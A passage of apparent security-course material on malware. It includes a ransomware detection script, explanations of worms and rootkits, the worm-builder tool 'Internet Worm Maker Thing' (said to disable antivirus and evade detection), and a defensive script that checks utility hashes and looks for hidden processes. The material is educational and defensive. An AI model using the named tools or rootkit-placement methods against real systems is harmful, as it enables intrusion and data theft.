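    return [{"rule": "ransom-note", "process": ev["process"], "path": ev["path"]}
            for ev in events
            if ev["action"] == "create" and base_name(ev["path"]).lower() in RANSOM_NOTE_NAMES]


def run_detection(events):
    return detect_mass_rename(events) + detect_ransom_notes(events)


# Constructed sample audit events (not real telemetry).
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T10:00:00", "process": "explorer.exe", "action": "rename",
     "src": r"C:\Users\alice\Documents\draft.txt", "dst": r"C:\Users\alice\Documents\final.txt"},
]
for i, name in enumerate(["budget.xlsx", "report.docx", "notes.txt", "deck.pptx", "scan.pdf", "photo.jpg"]):
    SAMPLE_EVENTS.append({"ts": f"2024-05-01T10:01:{i * 5:02d}", "process": "updater.exe", "action": "rename",
                          "src": rf"C:\Users\alice\Documents\{name}",
                          "dst": rf"C:\Users\alice\Documents\{name}.id-PLACEHOLDER.adobe"})
SAMPLE_EVENTS.append({"ts": "2024-05-01T10:01:40", "process": "updater.exe", "action": "create",
                      "path": r"C:\Users\alice\Documents\FILES ENCRYPTED.txt"})

if __name__ == "__main__":
    for alert in run_detection(SAMPLE_EVENTS):
        print(alert)
```

The rename rule keys on the extension actually written rather than on a fixed list, so it also catches a family whose extension is not yet known; the note rule is the cheap, high-confidence complement. In production both would feed an automatic response (suspend the process, isolate the host) rather than only an alert, because by the time a human reads it the encryption has moved on.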
Computer Worms

Computer worms are standalone malicious programs that replicate, execute, and spread across network connections independently without human intervention. Intruders design most worms to replicate and spread across a network, thus consuming available computing resources and, in turn, causing network servers, web servers, and individual computer systems to become overloaded and stop responding. However, some worms also carry a payload to damage the host system.

Worms are a subtype of viruses. A worm does not require a host to replicate; however, in some cases, the worm's host machine is also infected. Initially, black hat professionals treated worms as a mainframe problem. Later, with the introduction of the Internet, they mainly focused on and targeted Windows OS using the same worms by sharing them via e-mail, IRC, and other network functions.

Attackers use worm payloads to install backdoors on infected computers, which turns them into zombies and creates a botnet. Attackers use these botnets to initiate cyber-attacks.

Some of the latest computer worms are as follows:
- Monero
- Bondat
- Beapy
Figure 1.10: Depiction of worm propagation (the attacker propagates the worm over the network; a victim downloads the malicious program, which then infects other victim systems)

How is a Worm Different from a Virus?

- A worm replicates on its own: A worm is a special type of malware that can replicate itself and use memory but cannot attach itself to other programs.
- A worm spreads through the infected network: A worm takes advantage of file or information transport features on computer systems and automatically spreads through the infected network, but a virus does not.

Table 1.2: Difference between virus and worm

Virus | Worm
A virus infects a system by inserting itself into a file or executable program | A worm infects a system by exploiting a vulnerability in an OS or application by replicating itself
It might delete or alter the content of files or change the location of files in the system | Typically, a worm does not modify any stored programs; it only exploits the CPU and memory
It alters the way a computer system operates without the knowledge or consent of a user | It consumes network bandwidth, system memory, etc., excessively overloading servers and computer systems
A virus cannot spread to other computers unless an infected file is replicated and sent to the other computers | A worm can replicate itself and spread using IRC, Outlook, or other applicable mailing programs after installation in a system
A virus spreads at a uniform rate, as programmed | A worm spreads more rapidly than a virus
Viruses are difficult to remove from infected machines | Compared with a virus, a worm can be removed easily from a system

Worm Makers

Worm makers are tools that are used to create and customize computer worms to perform malicious tasks. These worms, once created, spread independently over networks and poison entire networks. With the help of pre-defined options in the worm makers, a worm can be designed according to the task it is intended to execute.

Internet Worm Maker Thing

Internet Worm Maker Thing is an open-source tool used to create worms that can infect a victim's drives and files, show messages, disable antivirus software, etc. This tool comes with a compiler that can easily convert your batch virus into an executable to evade antivirus software or for any other purpose.
Figure 1.11: Screenshot of Internet Worm Maker Thing

Some additional worm makers are as follows:
- Batch Worm Generator
- C++ Worm Generator
Rootkits

The attacker places a rootkit by:
- Scanning for vulnerable computers and servers on the web
- Wrapping it in a special package like a game
- Installing it on public computers or corporate computers through social engineering
- Launching a zero-day attack (privilege escalation, buffer overflow, Windows kernel exploitation, etc.)

Objectives of a rootkit:
- To root the host system and gain remote backdoor access
- To mask attacker tracks and the presence of malicious applications or processes
- To gather sensitive data, network traffic, etc. from the system to which attackers might be restricted or possess no access
- To store other malicious programs on the system and act as a server resource for bot updates

Rootkits are software programs designed to gain access to a computer without being detected. They are malware that help attackers gain unauthorized access to a remote system and perform malicious activities. The goal of a rootkit is to gain root privileges to a system. By logging in as the root user of a system, an attacker can perform various tasks such as installing software or deleting files.
It works by exploiting the vulnerabilities in the OS and its applications. It builds a backdoor login process in the OS via which the attacker can evade the standard login process. Once the user enables root access, a rootkit may attempt to hide the traces of unauthorized access by modifying drivers or kernel modules and discarding active processes.

Rootkits replace certain OS calls and utilities with their own modified versions of those routines that, in turn, undermine the security of the target system by executing malicious functions. A typical rootkit comprises backdoor programs, DDoS programs, packet sniffers, log-wiping utilities, IRC bots, and others.

Rootkits are used to hide viruses, worms, bots, etc., and are difficult to remove. Malware hidden by rootkits is used to monitor, filter, or steal sensitive information and resources, change the configuration settings of the target computer, and perform other potentially unsafe actions.

Rootkits are installed by attackers after gaining administrative access, either by exploiting a vulnerability or cracking a password. Once the attacker obtains control over the target system, they can modify files and existing software that detects rootkits. Rootkits are activated each time the system is rebooted, before the operating system completes loading, making their detection challenging.

Rootkits install hidden files, processes, hidden user accounts, etc., in the system's operating system to perform malicious activities. They intercept data from terminals, keyboard, and network connections, and enable attackers to extract sensitive information from the target user.
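Two of the behaviours described above, replacing OS utilities with modified versions and hiding processes, are what a defender checks for first. As an added example, not taken from the course text, the Python below records a size-and-SHA-256 manifest of a set of utilities while the system is known clean, later re-verifies them, and performs a cross-view process comparison between two independent enumerations (on Linux, for instance, a walk of /proc against the PIDs a process-listing tool reports). The utility files are constructed in a temporary directory and the PID lists are constructed in the test; build_manifest, verify_manifest, hidden_pids and demo are my own names.

```python
import hashlib
import os
import tempfile


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: str, names) -> dict:
    """Record size and SHA-256 of each utility under root; run this on a known-clean system
    and store the result off-host, where a rootkit on the machine cannot rewrite it."""
    manifest = {}
    for n in names:
        p = os.path.join(root, n)
        manifest[n] = {"sha256": sha256_file(p), "size": os.path.getsize(p)}
    return manifest


def verify_manifest(root: str, manifest: dict) -> list:
    """Compare the live files against the stored manifest; return (name, finding) pairs."""
    findings = []
    for name, expected in manifest.items():
        path = os.path.join(root, name)
        if not os.path.exists(path):
            findings.append((name, "missing"))
        elif os.path.getsize(path) != expected["size"]:
            findings.append((name, "size-mismatch"))
        elif sha256_file(path) != expected["sha256"]:
            findings.append((name, "hash-mismatch"))
    return findings


def hidden_pids(kernel_view, tool_view) -> list:
    """Cross-view check: PIDs present in a low-level enumeration but absent from the
    listing tool's output, which is how a user-land rootkit filtering ps shows itself."""
    return sorted(set(kernel_view) - set(tool_view))


def demo() -> list:
    """Constructed scenario: three shell-script 'utilities', a baseline, then ps is modified."""
    with tempfile.TemporaryDirectory() as d:
        utils = ["ls", "ps", "netstat"]
        for u in utils:
            with open(os.path.join(d, u), "wb") as f:
                f.write(b"#!/bin/sh\necho " + u.encode() + b"\n")
        manifest = build_manifest(d, utils)  # baseline while clean
        # simulate a replaced ps: same name, different content
        with open(os.path.join(d, "ps"), "wb") as f:
            f.write(b"#!/bin/sh\necho ps | grep -v hidden\n")
        return verify_manifest(d, manifest)


if __name__ == "__main__":
    print(demo())                                          # [('ps', 'hash-mismatch')] or size-mismatch
    print(hidden_pids([1, 200, 4242, 777], [1, 200, 777]))  # [4242]
```

The size check runs before the hash so that a crude replacement is reported cheaply, while a same-size patch still falls through to the hash comparison. The cross-view check only helps when the two enumerations really do take different code paths; a kernel-mode rootkit that hooks the underlying system call fools both, which is why the text describes kernel-level rootkits as the hardest to detect.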
Rootkits gather sensitive user information such as usernames, passwords, credit card details, and bank account details, in order to commit fraud or accomplish other malicious objectives.

The attacker places a rootkit by:
- Scanning for vulnerable computers and servers on the web
- Wrapping the rootkit in a special package like a game
- Installing it on public or corporate c
